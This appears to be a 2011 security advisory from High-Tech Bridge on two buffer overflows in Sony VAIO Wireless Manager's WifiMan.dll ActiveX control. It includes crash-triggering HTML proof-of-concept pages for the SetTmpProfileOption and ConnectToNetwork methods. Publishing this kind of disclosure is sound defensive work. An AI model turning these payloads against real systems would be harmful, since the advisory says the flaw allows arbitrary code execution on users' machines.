Lucene search

K
htbridgeHigh-Tech BridgeHTB23063
HistoryDec 07, 2011 - 12:00 a.m.

2 Buffer Overflows in Wireless Manager Sony VAIO

2011-12-0700:00:00
High-Tech Bridge
www.htbridge.com
23

EPSS

0.242

Percentile

96.6%

High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system.

  1. Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985

1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid=β€œclsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}”></object>
< SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, β€œX”)
arg3=β€œdefaultV”
ctrl.SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value=β€œSony_POC”>
</BODY>
</HTML>

1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid=β€œclsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}”></object>
< SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, β€œX”)
ctrl.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value=β€œSony_POC”>
</BODY>
</HTML>